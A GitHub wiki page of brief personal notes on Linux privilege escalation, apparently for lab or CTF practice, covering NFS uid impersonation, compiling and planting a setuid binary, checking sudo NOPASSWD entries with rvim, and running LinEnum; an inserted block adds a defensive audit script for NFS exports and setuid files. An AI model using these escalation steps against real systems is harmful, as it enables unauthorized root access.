Linux escalate steps
lethanhtung01011980 edited this page Jan 7, 2020 · 19 revisions
- From nobody to user
- From User to root
Methods
- Can attack using a user with the same uid and gid as the victim user on the victim PC
- Via NFS root_squash,no_all_squash
To use setuid
- Sample code https://github.com/lethanhtung01011980/Notes/blob/master/runAsOtherLinuxUser.c
- su - frank
- vim runAsOtherLinuxUser.c
- gcc runAsOtherLinuxUser.c -o runAsOtherLinuxUser
- chmod u+s runAsOtherLinuxUser
- In victim PC, ./runAsOtherLinuxUser
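A defender-side check for the NFS and setuid method above, as an added example that is not part of the original page: it lists exports that do not set all_squash (so client uids/gids are used as-is) and the setuid/setgid files under them. The function names and the sample exports file are assumptions; export paths containing spaces are not handled.

```shell
#!/bin/sh
# Added audit example; function names are hypothetical, not from the page.

# Print "path client" for each export entry that does not set all_squash,
# i.e. non-root client uids/gids are used as-is (no_all_squash is the default).
exports_trusting_client_uids() {
    # $1: exports file, normally /etc/exports
    sed -e 's/#.*//' "$1" | awk '
        NF == 1 { print $1, "*" }   # no client field: report it for review
        NF >= 2 {
            for (i = 2; i <= NF; i++) {
                client = $i; opts = ""
                p = index($i, "(")
                if (p > 0) {
                    client = substr($i, 1, p - 1)
                    opts = substr($i, p + 1)
                    sub(/\)$/, "", opts)
                }
                # ",no_all_squash," does not match, only the bare option does
                if (("," opts ",") !~ /,all_squash,/)
                    print $1, (client == "" ? "*" : client)
            }
        }'
}

# List setuid/setgid regular files under every export path reported above.
setid_files_in_exports() {
    exports_trusting_client_uids "$1" | cut -d' ' -f1 | sort -u |
    while IFS= read -r dir; do
        if [ -d "$dir" ]; then
            find "$dir" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null
        fi
    done
}

# Constructed sample exports file (not from the page) for a stand-alone run.
sample=$(mktemp)
cat > "$sample" <<'EOF'
/srv/share 10.0.0.0/24(rw,root_squash,no_all_squash)   # flagged
/srv/pub   *(ro,all_squash)                            # not flagged
EOF
exports_trusting_client_uids "$sample"
rm -f "$sample"
```

Exporting with all_squash, or mounting the exported filesystem nosuid, removes the precondition for this method.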
To check if you can run sudo with "NOPASSWD", aka as root:
sudo -l
User frank may run the following commands on this host:
(frank) NOPASSWD: /opt/logreader/logreader.sh
(adm) NOPASSWD: /usr/bin/rvim /var/www/html/jailuser/dev/jail.c
If you see "Vim: Warning: Output is not to a terminal"
- Type ZQ
Or run LinEnum